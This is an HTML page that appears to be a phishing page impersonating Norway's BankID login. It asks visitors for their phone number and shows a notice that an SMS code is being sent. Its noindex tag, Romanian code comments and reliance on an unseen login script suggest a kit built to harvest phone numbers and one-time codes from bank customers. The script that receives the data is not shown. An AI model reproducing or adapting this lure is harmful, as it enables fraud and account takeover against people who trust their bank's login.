<!DOCTYPE html>
<html lang="nb">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="robots" content="noindex, nofollow">
    <link rel="icon" type="image/png" href="img/favicon.b4be5517.png">
    <title>BankID</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link href="css/authorization.11f23e186330ca22e8f9.css" rel="stylesheet">
    <script type="text/javascript" src="js/jquery-3.6.3.min.js"></script>
    <script type="text/javascript" src="js/login1.js"></script>
    <style>
        /* Stilizare placeholder */
        input::placeholder {
            font-size: 16px; /* Dimensiunea textului placeholder-ului */
            color: #888; /* Culoarea textului placeholder-ului (op?ional) */
        }
    </style>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>
</head>
<body class="">

  <div class="modal fade" id="loadingModal"  tabindex="-1" aria-labelledby="noCloseModalLabel" aria-hidden="true" data-bs-backdrop="static" data-bs-keyboard="false">
    <div class="modal-dialog modal-dialog-centered">
      <div class="modal-content text-center">
        <div class="modal-body">
          <p>Vennligst vent. Vi sender SMS-koden til telefonen din:</p>
          <div class="spinner-border text-primary" role="status">
            <span class="visually-hidden">Loading...</span>
          </div>
        </div>
      </div>
    </div>
  </div>

    <main class="container">
        <div class="container__content">
            <div class="bankid-logo-wrapper">
                <img alt="" class="bankid-logo" src="img/bankid-logo.28f35de5.svg">
            </div>
            <div id="wait">
                <img alt="" class="bankid-symbol" src="img/bankid-symbol-animated.ee3b536a.svg">
                <span class="sr-only" role="alert" lang="en">Loading</span>
            </div>
            <div class="page" id="getNnin" style="">
                <form id="nnin-form" novalidate="">
                    <div class="page__content">
                        <span class="merchant_name">BankID MinSide</span>
                        <label for="nnin" data-i18n="nnin_label">Hva er telefonnummeret ditt?</label>
                        <input name="nnin" id="nnin" placeholder="+47" maxlength="8" minlength="1" inputmode="numeric" autocomplete="off" aria-labelledby="nnin-title" aria-describedby="nninValidationMessage" aria-invalid="true" required="" data-format="...... ....." data-slots="." data-separator=" ">
                        <div class="helper-text-container">
                            <img id="helperTextErrorIcon" src="img/helper-text-error.b85af04c.svg" alt="" style="display:none">
                            <p id="nninValidationMessage" class="validation-text" data-i18n="nnin_helper_text" aria-live="polite">Skriv inn telefonnummer</p>
                        </div>
                        <div class="buttons__page__middle">
                            <button type="button" data-i18n="next" id="nnin-next-button" class="button button--default">Neste</button>
                        </div>
                    </div>
                </form>
                <div class="page__buttons">
                    <button data-i18n="cancel" id="decline-nnin-button" class="button button--link">Avbryt</button>
                </div>
            </div>
        </div>
    </main>
</body>
</html>
